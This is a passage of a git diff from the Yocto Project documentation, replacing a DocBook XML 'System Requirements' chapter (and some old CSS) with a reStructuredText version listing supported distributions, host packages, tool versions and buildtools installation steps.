- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/ref-manual/ref-system-requirements.rst b/documentation/ref-manual/ref-system-requirements.rst
new file mode 100644
index 0000000000..efb60e1009
--- /dev/null
+++ b/documentation/ref-manual/ref-system-requirements.rst
@@ -0,0 +1,475 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+System Requirements
+*******************
+
+Welcome to the Yocto Project Reference Manual! This manual provides
+reference information for the current release of the Yocto Project, and
+is most effectively used after you have an understanding of the basics
+of the Yocto Project. The manual is neither meant to be read as a
+starting point to the Yocto Project, nor read from start to finish.
+Rather, use this manual to find variable definitions, class
+descriptions, and so forth as needed during the course of using the
+Yocto Project.
+
+For introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>` and the
+":ref:`overview-manual/overview-manual-development-environment:the yocto project development environment`"
+chapter in the Yocto Project Overview and Concepts Manual.
+
+If you want to use the Yocto Project to quickly build an image without
+having to understand concepts, work through the
+:doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document. You can find "how-to"
+information in the :doc:`../dev-manual/dev-manual`. You can find Yocto Project overview
+and conceptual information in the :doc:`../overview-manual/overview-manual`.
+
+.. note::
+
+ For more information about the Yocto Project Documentation set, see
+ the :ref:`ref-manual/resources:links and related documentation` section.
+
+.. _detailed-supported-distros:
+
+Supported Linux Distributions
+=============================
+
+Currently, the &DISTRO; release ("&DISTRO_NAME;") of the Yocto Project is
+supported on the following distributions:
+
+- Ubuntu 20.04 (LTS)
+
+- Ubuntu 22.04 (LTS)
+
+- Fedora 38
+
+- Debian GNU/Linux 11.x (Bullseye)
+
+- AlmaLinux 8
+
+The following distribution versions are still tested even though the
+organizations publishing them no longer make updates publicly available:
+
+- Ubuntu 18.04 (LTS)
+
+Finally, here are the distribution versions which were previously
+tested on former revisions of "&DISTRO_NAME;", but no longer are:
+
+- Ubuntu 16.04 (LTS)
+
+- Ubuntu 19.04
+
+- Fedora 28
+
+- Fedora 29
+
+- Fedora 30
+
+- Fedora 31
+
+- Fedora 32
+
+- Fedora 33
+
+- Fedora 34
+
+- Fedora 35
+
+- Fedora 36
+
+- Fedora 37
+
+- CentOS 7.x
+
+- CentOS 8.x
+
+- Debian GNU/Linux 8.x (Jessie)
+
+- Debian GNU/Linux 9.x (Stretch)
+
+- Debian GNU/Linux 10.x (Buster)
+
+- OpenSUSE Leap 15.1
+
+- OpenSUSE Leap 15.2
+
+- OpenSUSE Leap 15.3
+
+.. note::
+
+ - While the Yocto Project Team attempts to ensure all Yocto Project
+ releases are one hundred percent compatible with each officially
+ supported Linux distribution, instances might exist where you
+ encounter a problem while using the Yocto Project on a specific
+ distribution.
+
+ - Yocto Project releases are tested against the stable Linux
+ distributions in the above list. The Yocto Project should work
+ on other distributions but validation is not performed against
+ them.
+
+ - In particular, the Yocto Project does not support and currently
+ has no plans to support rolling-releases or development
+ distributions due to their constantly changing nature. We welcome
+ patches and bug reports, but keep in mind that our priority is on
+ the supported platforms listed below.
+
+ - You may use Windows Subsystem For Linux v2 to set up a build host
+ using Windows 10, but validation is not performed against build
+ hosts using WSLv2.
+
+ - The Yocto Project is not compatible with WSLv1, it is
+ compatible but not officially supported nor validated with
+ WSLv2, if you still decide to use WSL please upgrade to WSLv2.
+
+ - If you encounter problems, please go to :yocto_bugs:`Yocto Project
+ Bugzilla <>` and submit a bug. We are
+ interested in hearing about your experience. For information on
+ how to submit a bug, see the Yocto Project
+ :yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+ and the ":ref:`dev-manual/dev-manual-common-tasks:submitting a defect against the yocto project`"
+ section in the Yocto Project Development Tasks Manual.
+
+
+Required Packages for the Build Host
+====================================
+
+The list of packages you need on the host development system can be
+large when covering all build scenarios using the Yocto Project. This
+section describes required packages according to Linux distribution and
+function.
+
+.. _ubuntu-packages:
+
+Ubuntu and Debian
+-----------------
+
+The following list shows the required packages by function given a
+supported Ubuntu or Debian Linux distribution:
+
+.. note::
+
+ - If your build system has the ``oss4-dev`` package installed, you
+ might experience QEMU build failures due to the package installing
+ its own custom ``/usr/include/linux/soundcard.h`` on the Debian
+ system. If you run into this situation, either of the following
+ solutions exist:
+ ::
+
+ $ sudo apt-get build-dep qemu
+ $ sudo apt-get remove oss4-dev
+
+ - For Debian-8, ``python3-git`` and ``pylint3`` are no longer
+ available via ``apt-get``.
+ ::
+
+ $ sudo pip3 install GitPython pylint==1.9.5
+
+- *Essentials:* Packages needed to build an image on a headless system:
+ ::
+
+ $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
+
+- *Documentation:* Packages needed if you are going to build out the
+ Yocto Project documentation manuals:
+ ::
+
+ $ sudo apt-get install make python3-pip
+ &PIP3_HOST_PACKAGES_DOC;
+
+ .. note::
+
+ It is currently not possible to build out documentation from Debian 8
+ (Jessie) because of outdated ``pip3`` and ``python3``. ``python3-sphinx``
+ is too outdated.
+
+Fedora Packages
+---------------
+
+The following list shows the required packages by function given a
+supported Fedora Linux distribution:
+
+- *Essentials:* Packages needed to build an image for a headless
+ system:
+ ::
+
+ $ sudo dnf install &FEDORA_HOST_PACKAGES_ESSENTIAL;
+
+- *Documentation:* Packages needed if you are going to build out the
+ Yocto Project documentation manuals:
+ ::
+
+ $ sudo dnf install make python3-pip which
+ &PIP3_HOST_PACKAGES_DOC;
+
+openSUSE Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported openSUSE Linux distribution:
+
+- *Essentials:* Packages needed to build an image for a headless
+ system:
+ ::
+
+ $ sudo zypper install &OPENSUSE_HOST_PACKAGES_ESSENTIAL;
+
+- *Documentation:* Packages needed if you are going to build out the
+ Yocto Project documentation manuals:
+ ::
+
+ $ sudo zypper install make python3-pip which
+ &PIP3_HOST_PACKAGES_DOC;
+
+
+CentOS-7 Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported CentOS-7 Linux distribution:
+
+- *Essentials:* Packages needed to build an image for a headless
+ system:
+ ::
+
+ $ sudo yum install &CENTOS7_HOST_PACKAGES_ESSENTIAL;
+
+ .. note::
+
+ - Extra Packages for Enterprise Linux (i.e. ``epel-release``) is
+ a collection of packages from Fedora built on RHEL/CentOS for
+ easy installation of packages not included in enterprise Linux
+ by default. You need to install these packages separately.
+
+ - The ``makecache`` command consumes additional Metadata from
+ ``epel-release``.
+
+- *Documentation:* Packages needed if you are going to build out the
+ Yocto Project documentation manuals:
+ ::
+
+ $ sudo yum install make python3-pip which
+ &PIP3_HOST_PACKAGES_DOC;
+
+CentOS-8 Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported CentOS-8 Linux distribution:
+
+- *Essentials:* Packages needed to build an image for a headless
+ system:
+ ::
+
+ $ sudo dnf install &CENTOS8_HOST_PACKAGES_ESSENTIAL;
+
+ .. note::
+
+ - Extra Packages for Enterprise Linux (i.e. ``epel-release``) is
+ a collection of packages from Fedora built on RHEL/CentOS for
+ easy installation of packages not included in enterprise Linux
+ by default. You need to install these packages separately.
+
+ - The ``PowerTools`` repo provides additional packages such as
+ ``rpcgen`` and ``texinfo``.
+
+ - The ``makecache`` command consumes additional Metadata from
+ ``epel-release``.
+
+- *Documentation:* Packages needed if you are going to build out the
+ Yocto Project documentation manuals:
+ ::
+
+ $ sudo dnf install make python3-pip which
+ &PIP3_HOST_PACKAGES_DOC;
+
+Required Git, tar, Python and gcc Versions
+==========================================
+
+In order to use the build system, your host development system must meet
+the following version requirements for Git, tar, and Python:
+
+- Git 1.8.3.1 or greater
+
+- tar 1.28 or greater
+
+- Python 3.5.0 or greater
+
+If your host development system does not meet all these requirements,
+you can resolve this by installing a ``buildtools`` tarball that
+contains these tools. You can get the tarball one of two ways: download
+a pre-built tarball or use BitBake to build the tarball.
+
+In addition, your host development system must meet the following
+version requirement for gcc:
+
+- gcc 5.0 or greater
+
+If your host development system does not meet this requirement, you can
+resolve this by installing a ``buildtools-extended`` tarball that
+contains additional tools, the equivalent of ``buildtools-essential``.
+
+Installing a Pre-Built ``buildtools`` Tarball with ``install-buildtools`` script
+--------------------------------------------------------------------------------
+
+The ``install-buildtools`` script is the easiest of the three methods by
+which you can get these tools. It downloads a pre-built buildtools
+installer and automatically installs the tools for you:
+
+1. Execute the ``install-buildtools`` script. Here is an example:
+ ::
+
+ $ cd poky
+ $ scripts/install-buildtools --without-extended-buildtools \
+ --base-url &YOCTO_DL_URL;/releases/yocto \
+ --release yocto-&DISTRO; \
+ --installer-version &DISTRO;
+
+ During execution, the buildtools tarball will be downloaded, the
+ checksum of the download will be verified, the installer will be run
+ for you, and some basic checks will be run to to make sure the
+ installation is functional.
+
+ To avoid the need of ``sudo`` privileges, the ``install-buildtools``
+ script will by default tell the installer to install in:
+ ::
+
+ /path/to/poky/buildtools
+
+ If your host development system needs the additional tools provided
+ in the ``buildtools-extended`` tarball, you can instead execute the
+ ``install-buildtools`` script with the default parameters:
+ ::
+
+ $ cd poky
+ $ scripts/install-buildtools
+
+2. Source the tools environment setup script by using a command like the
+ following:
+ ::
+
+ $ source /path/to/poky/buildtools/environment-setup-x86_64-pokysdk-linux
+
+ Of course, you need to supply your installation directory and be sure to
+ use the right file (i.e. i586 or x86_64).
+
+ After you have sourced the setup script, the tools are added to
+ ``PATH`` and any other environment variables required to run the
+ tools are initialized. The results are working versions versions of
+ Git, tar, Python and ``chrpath``. And in the case of the
+ ``buildtools-extended`` tarball, additional working versions of tools
+ including ``gcc``, ``make`` and the other tools included in
+ ``packagegroup-core-buildessential``.
+
+Downloading a Pre-Built ``buildtools`` Tarball
+----------------------------------------------
+
+Downloading and running a pre-built buildtools installer is the easiest
+of the two methods by which you can get these tools:
+
+1. Locate and download the ``*.sh`` at :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/buildtools/`
+
+2. Execute the installation script. Here is an example for the
+ traditional installer:
+ ::
+
+ $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-DISTRO.sh
+
+ Here is an example for the extended installer:
+ ::
+
+ $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-DISTRO.sh
+
+ During execution, a prompt appears that allows you to choose the
+ installation directory. For example, you could choose the following:
+ ``/home/your-username/buildtools``
+
+3. Source the tools environment setup script by using a command like the
+ following:
+ ::
+
+ $ source /home/your_username/buildtools/environment-setup-i586-poky-linux
+
+ Of
+ course, you need to supply your installation directory and be sure to
+ use the right file (i.e. i585 or x86-64).
+
+ After you have sourced the setup script, the tools are added to
+ ``PATH`` and any other environment variables required to run the
+ tools are initialized. The results are working versions versions of
+ Git, tar, Python and ``chrpath``. And in the case of the
+ ``buildtools-extended`` tarball, additional working versions of tools
+ including ``gcc``, ``make`` and the other tools included in
+ ``packagegroup-core-buildessential``.
+
+Building Your Own ``buildtools`` Tarball
+----------------------------------------
+
+Building and running your own buildtools installer applies only when you
+have a build host that can already run BitBake. In this case, you use
+that machine to build the ``.sh`` file and then take steps to transfer
+and run it on a machine that does not meet the minimal Git, tar, and
+Python (or gcc) requirements.
+
+Here are the steps to take to build and run your own buildtools
+installer:
+
+1. On the machine that is able to run BitBake, be sure you have set up
+ your build environment with the setup script
+ (:ref:`structure-core-script`).
+
+2. Run the BitBake command to build the tarball:
+ ::
+
+ $ bitbake buildtools-tarball
+
+ or run the BitBake command to build the extended tarball:
+ ::
+
+ $ bitbake buildtools-extended-tarball
+
+ .. note::
+
+ The :term:`SDKMACHINE` variable in your ``local.conf`` file determines
+ whether you build tools for a 32-bit or 64-bit system.
+
+ Once the build completes, you can find the ``.sh`` file that installs
+ the tools in the ``tmp/deploy/sdk`` subdirectory of the
+ :term:`Build Directory`. The installer file has the string
+ "buildtools" (or "buildtools-extended") in the name.
+
+3. Transfer the ``.sh`` file from the build host to the machine that
+ does not meet the Git, tar, or Python (or gcc) requirements.
+
+4. On the machine that does not meet the requirements, run the ``.sh``
+ file to install the tools. Here is an example for the traditional
+ installer:
+ ::
+
+ $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
+
+ Here is an example for the extended installer:
+ ::
+
+ $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
+
+ During execution, a prompt appears that allows you to choose the
+ installation directory. For example, you could choose the following:
+ ``/home/your_username/buildtools``
+
+5. Source the tools environment setup script by using a command like the
+ following:
+ ::
+
+ $ source /home/your_username/buildtools/environment-setup-x86_64-poky-linux
+
+ Of course, you need to supply your installation directory and be sure to
+ use the right file (i.e. i586 or x86_64).
+
+ After you have sourced the setup script, the tools are added to
+ ``PATH`` and any other environment variables required to run the
+ tools are initialized. The results are working versions versions of
+ Git, tar, Python and ``chrpath``. And in the case of the
+ ``buildtools-extended`` tarball, additional working versions of tools
+ including ``gcc``, ``make`` and the other tools included in
+ ``packagegroup-core-buildessential``.
diff --git a/documentation/ref-manual/ref-system-requirements.xml b/documentation/ref-manual/ref-system-requirements.xml
deleted file mode 100644
index c6e1eb9716..0000000000
--- a/documentation/ref-manual/ref-system-requirements.xml
+++ /dev/null
@@ -1,578 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-manual-system-requirements'>
-<title>System Requirements</title>
-
- <para>
- Welcome to the Yocto Project Reference Manual!
- This manual provides reference information for the current release
- of the Yocto Project, and
- is most effectively used after you have an understanding
- of the basics of the Yocto Project.
- The manual is neither meant to be read as a starting point to the
- Yocto Project, nor read from start to finish.
- Rather, use this manual to find variable definitions, class
- descriptions, and so forth as needed during the course of using
- the Yocto Project.
- </para>
-
- <para>
- For introductory information on the Yocto Project, see the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink> and the
- "<ulink url='&YOCTO_DOCS_OM_URL;#overview-development-environment'>Yocto Project Development Environment</ulink>"
- chapter in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <para>
- If you want to use the Yocto Project to quickly build an image
- without having to understand concepts, work through the
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
- document.
- You can find "how-to" information in the
- <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>.
- You can find Yocto Project overview and conceptual information in the
- <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
- <note><title>Tip</title>
- For more information about the Yocto Project Documentation set,
- see the
- "<link linkend='resources-links-and-related-documentation'>Links and Related Documentation</link>"
- section.
- </note>
- </para>
-
- <section id='detailed-supported-distros'>
- <title>Supported Linux Distributions</title>
-
- <para>
- Currently, the Yocto Project is supported on the following
- distributions:
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Yocto Project releases are tested against the stable
- Linux distributions in the following list.
- The Yocto Project should work on other distributions but
- validation is not performed against them.
- </para></listitem>
- <listitem><para>
- In particular, the Yocto Project does not support
- and currently has no plans to support
- rolling-releases or development distributions due to
- their constantly changing nature.
- We welcome patches and bug reports, but keep in mind
- that our priority is on the supported platforms listed
- below.
- </para></listitem>
- <listitem><para>
- You may use Windows Subsystem For Linux v2 to set up a build
- host using Windows 10, but validation is not performed
- against build hosts using WSLv2.
- <note>
- The Yocto Project is not compatible with WSLv1, it is
- compatible but not officially supported nor validated
- with WSLv2, if you still decide to use WSL please upgrade
- to WSLv2.
- </note>
- </para></listitem>
- <listitem><para>
- If you encounter problems, please go to
- <ulink url='&YOCTO_BUGZILLA_URL;'>Yocto Project Bugzilla</ulink>
- and submit a bug.
- We are interested in hearing about your experience.
- For information on how to submit a bug, see the
- Yocto Project
- <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>
- and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </itemizedlist>
- </note>
- <itemizedlist>
- <listitem><para>Ubuntu 16.04 (LTS)</para></listitem>
- <listitem><para>Ubuntu 18.04 (LTS)</para></listitem>
- <listitem><para>Ubuntu 19.04</para></listitem>
- <listitem><para>Ubuntu 20.04</para></listitem>
- <listitem><para>Fedora 28</para></listitem>
- <listitem><para>Fedora 29</para></listitem>
- <listitem><para>Fedora 30</para></listitem>
- <listitem><para>Fedora 31</para></listitem>
- <listitem><para>Fedora 32</para></listitem>
- <listitem><para>CentOS 7.x</para></listitem>
- <listitem><para>Debian GNU/Linux 8.x (Jessie)</para></listitem>
- <listitem><para>Debian GNU/Linux 9.x (Stretch)</para></listitem>
- <listitem><para>Debian GNU/Linux 10.x (Buster)</para></listitem>
- <listitem><para>OpenSUSE Leap 15.1</para></listitem>
- </itemizedlist>
- </para>
-
- <note>
- While the Yocto Project Team attempts to ensure all Yocto Project
- releases are one hundred percent compatible with each officially
- supported Linux distribution, instances might exist where you
- encounter a problem while using the Yocto Project on a specific
- distribution.
- </note>
- </section>
-
- <section id='required-packages-for-the-build-host'>
- <title>Required Packages for the Build Host</title>
-
- <para>
- The list of packages you need on the host development system can
- be large when covering all build scenarios using the Yocto Project.
- This section describes required packages according to
- Linux distribution and function.
- </para>
-
- <section id='ubuntu-packages'>
- <title>Ubuntu and Debian</title>
-
- <para>
- The following list shows the required packages by function
- given a supported Ubuntu or Debian Linux distribution:
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- If your build system has the
- <filename>oss4-dev</filename> package installed, you
- might experience QEMU build failures due to the package
- installing its own custom
- <filename>/usr/include/linux/soundcard.h</filename> on
- the Debian system.
- If you run into this situation, either of the following
- solutions exist:
- <literallayout class='monospaced'>
- $ sudo apt-get build-dep qemu
- $ sudo apt-get remove oss4-dev
- </literallayout>
- </para></listitem>
- <listitem><para>
- For Debian-8, <filename>python3-git</filename> and <filename>pylint3</filename> are no longer available via <filename>apt-get</filename>.
- <literallayout class='monospaced'>
- $ sudo pip3 install GitPython pylint==1.9.5
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </note>
- <itemizedlist>
- <listitem><para><emphasis>Essentials:</emphasis>
- Packages needed to build an image on a headless
- system:
- <literallayout class='monospaced'>
- $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
- </literallayout></para></listitem>
- <listitem><para><emphasis>Documentation:</emphasis>
- Packages needed if you are going to build out the
- Yocto Project documentation manuals:
- <literallayout class='monospaced'>
- $ sudo apt-get install make xsltproc docbook-utils fop dblatex xmlto
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='fedora-packages'>
- <title>Fedora Packages</title>
-
- <para>
- The following list shows the required packages by function
- given a supported Fedora Linux distribution:
- <itemizedlist>
- <listitem><para><emphasis>Essentials:</emphasis>
- Packages needed to build an image for a headless
- system:
- <literallayout class='monospaced'>
- $ sudo dnf install &FEDORA_HOST_PACKAGES_ESSENTIAL;
- </literallayout></para></listitem>
- <listitem><para><emphasis>Documentation:</emphasis>
- Packages needed if you are going to build out the
- Yocto Project documentation manuals:
- <literallayout class='monospaced'>
- $ sudo dnf install docbook-style-dsssl docbook-style-xsl \
- docbook-dtds docbook-utils fop libxslt dblatex xmlto
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='opensuse-packages'>
- <title>openSUSE Packages</title>
-
- <para>
- The following list shows the required packages by function
- given a supported openSUSE Linux distribution:
- <itemizedlist>
- <listitem><para><emphasis>Essentials:</emphasis>
- Packages needed to build an image for a headless
- system:
- <literallayout class='monospaced'>
- $ sudo zypper install &OPENSUSE_HOST_PACKAGES_ESSENTIAL;
- </literallayout></para></listitem>
- <listitem><para><emphasis>Documentation:</emphasis>
- Packages needed if you are going to build out the
- Yocto Project documentation manuals:
- <literallayout class='monospaced'>
- $ sudo zypper install dblatex xmlto
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='centos-7-packages'>
- <title>CentOS-7 Packages</title>
-
- <para>
- The following list shows the required packages by function
- given a supported CentOS-7 Linux distribution:
- <itemizedlist>
- <listitem><para><emphasis>Essentials:</emphasis>
- Packages needed to build an image for a headless
- system:
- <literallayout class='monospaced'>
- $ sudo yum install &CENTOS7_HOST_PACKAGES_ESSENTIAL;
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Extra Packages for Enterprise Linux
- (i.e. <filename>epel-release</filename>)
- is a collection of packages from Fedora
- built on RHEL/CentOS for easy installation
- of packages not included in enterprise
- Linux by default.
- You need to install these packages
- separately.
- </para></listitem>
- <listitem><para>
- The <filename>makecache</filename> command
- consumes additional Metadata from
- <filename>epel-release</filename>.
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- <listitem><para><emphasis>Documentation:</emphasis>
- Packages needed if you are going to build out the
- Yocto Project documentation manuals:
- <literallayout class='monospaced'>
- $ sudo yum install docbook-style-dsssl docbook-style-xsl \
- docbook-dtds docbook-utils fop libxslt dblatex xmlto
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='centos-8-packages'>
- <title>CentOS-8 Packages</title>
-
- <para>
- The following list shows the required packages by function
- given a supported CentOS-8 Linux distribution:
- <itemizedlist>
- <listitem><para><emphasis>Essentials:</emphasis>
- Packages needed to build an image for a headless
- system:
- <literallayout class='monospaced'>
- $ sudo dnf install &CENTOS8_HOST_PACKAGES_ESSENTIAL;
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Extra Packages for Enterprise Linux
- (i.e. <filename>epel-release</filename>)
- is a collection of packages from Fedora
- built on RHEL/CentOS for easy installation
- of packages not included in enterprise
- Linux by default.
- You need to install these packages
- separately.
- </para></listitem>
- <listitem><para>
- The <filename>PowerTools</filename> repo
- provides additional packages such as
- <filename>rpcgen</filename> and
- <filename>texinfo</filename>.
- </para></listitem>
- <listitem><para>
- The <filename>makecache</filename> command
- consumes additional Metadata from
- <filename>epel-release</filename>.
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- <listitem><para><emphasis>Documentation:</emphasis>
- Packages needed if you are going to build out the
- Yocto Project documentation manuals:
- <literallayout class='monospaced'>
- $ sudo dnf install docbook-style-dsssl docbook-style-xsl \
- docbook-dtds docbook-utils fop libxslt dblatex xmlto
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='required-git-tar-python-and-gcc-versions'>
- <title>Required Git, tar, Python and gcc Versions</title>
-
- <para>
- In order to use the build system, your host development system
- must meet the following version requirements for Git, tar, and
- Python:
- <itemizedlist>
- <listitem><para>Git 1.8.3.1 or greater</para></listitem>
- <listitem><para>tar 1.28 or greater</para></listitem>
- <listitem><para>Python 3.5.0 or greater</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- If your host development system does not meet all these requirements,
- you can resolve this by installing a <filename>buildtools</filename>
- tarball that contains these tools.
- You can get the tarball one of two ways: download a pre-built
- tarball or use BitBake to build the tarball.
- </para>
-
- <para>
- In addition, your host development system must meet the following
- version requirement for gcc:
- <itemizedlist>
- <listitem><para>gcc 5.0 or greater</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- If your host development system does not meet this requirement,
- you can resolve this by installing a <filename>buildtools-extended</filename>
- tarball that contains additional tools, the equivalent of <filename>buildtools-essential</filename>.
- </para>
- <section id='installing-a-pre-built-buildtools-tarball-with-install-buildtools-script'>
- <title>Installing a Pre-Built <filename>buildtools</filename> Tarball with <filename>install-buildtools</filename> script</title>
-
- <para>
- The <filename>install-buildtools</filename> script is the easiest
- of the three methods by which you can get these tools. It downloads
- a pre-built buildtools installer and automatically installs the tools
- for you:
- <orderedlist>
- <listitem><para>
- Execute the <filename>install-buildtools</filename> script.
- Here is an example:
- <literallayout class='monospaced'>
- $ cd poky
- $ scripts/install-buildtools --without-extended-buildtools \
- --base-url &YOCTO_DL_URL;/releases/yocto \
- --release yocto-&DISTRO; \
- --installer-version &DISTRO;
- </literallayout>
- <para>
- During execution, the buildtools tarball will be downloaded,
- the checksum of the download will be verified, the installer
- will be run for you, and some basic checks will be run to
- to make sure the installation is functional.
- </para>
- <para>
- To avoid the need of <filename>sudo</filename> privileges,
- the <filename>install-buildtools</filename> script will
- by default tell the installer to install in:
- <literallayout class='monospaced'>
- <replaceable>/path/to/</replaceable>poky/buildtools
- </literallayout>
- </para>
- <para>
- If your host development system needs the additional tools
- provided in the <filename>buildtools-extended</filename>
- tarball, you can instead execute the
- <filename>install-buildtools</filename> script with the
- default parameters:
- <literallayout class='monospaced'>
- $ cd poky
- $ scripts/install-buildtools
- </literallayout>
- </para>
- </para></listitem>
- <listitem><para>
- Source the tools environment setup script by using a
- command like the following:
- <literallayout class='monospaced'>
- $ source <replaceable>/path/to/</replaceable>poky/buildtools/environment-setup-x86_64-pokysdk-linux
- </literallayout>
- Of course, you need to supply your installation directory and be
- sure to use the right file (i.e. i586 or x86_64).
- </para>
- <para>
- After you have sourced the setup script,
- the tools are added to <filename>PATH</filename>
- and any other environment variables required to run the
- tools are initialized.
- The results are working versions versions of Git, tar,
- Python and <filename>chrpath</filename>. And in the case of
- the <filename>buildtools-extended</filename> tarball, additional
- working versions of tools including <filename>gcc</filename>,
- <filename>make</filename> and the other tools included in
- <filename>packagegroup-core-buildessential</filename>.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='downloading-a-pre-built-buildtools-tarball'>
- <title>Downloading a Pre-Built <filename>buildtools</filename> Tarball</title>
-
- <para>
- Downloading and running a pre-built buildtools installer is
- the easiest of the two methods by which you can get these tools:
- <orderedlist>
- <listitem><para>
- Locate and download the <filename>*.sh</filename> at
- <ulink url='&YOCTO_RELEASE_DL_URL;/buildtools/'></ulink>.
- </para></listitem>
- <listitem><para>
- Execute the installation script.
- Here is an example for the traditional installer:
- <literallayout class='monospaced'>
- $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
- </literallayout>
- Here is an example for the extended installer:
- <literallayout class='monospaced'>
- $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
- </literallayout>
- During execution, a prompt appears that allows you to
- choose the installation directory.
- For example, you could choose the following:
- <literallayout class='monospaced'>
- /home/<replaceable>your-username</replaceable>/buildtools
- </literallayout>
- </para></listitem>
- <listitem><para>
- Source the tools environment setup script by using a
- command like the following:
- <literallayout class='monospaced'>
- $ source /home/<replaceable>your_username</replaceable>/buildtools/environment-setup-i586-poky-linux
- </literallayout>
- Of course, you need to supply your installation directory and be
- sure to use the right file (i.e. i585 or x86-64).
- </para>
- <para>
- After you have sourced the setup script,
- the tools are added to <filename>PATH</filename>
- and any other environment variables required to run the
- tools are initialized.
- The results are working versions versions of Git, tar,
- Python and <filename>chrpath</filename>. And in the case of
- the <filename>buildtools-extended</filename> tarball, additional
- working versions of tools including <filename>gcc</filename>,
- <filename>make</filename> and the other tools included in
- <filename>packagegroup-core-buildessential</filename>.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='building-your-own-buildtools-tarball'>
- <title>Building Your Own <filename>buildtools</filename> Tarball</title>
-
- <para>
- Building and running your own buildtools installer applies
- only when you have a build host that can already run BitBake.
- In this case, you use that machine to build the
- <filename>.sh</filename> file and then
- take steps to transfer and run it on a
- machine that does not meet the minimal Git, tar, and Python
- (or gcc) requirements.
- </para>
-
- <para>
- Here are the steps to take to build and run your own
- buildtools installer:
- <orderedlist>
- <listitem><para>
